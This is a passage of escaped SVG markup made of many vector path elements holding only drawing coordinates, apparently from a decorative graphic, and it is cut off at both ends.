d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path 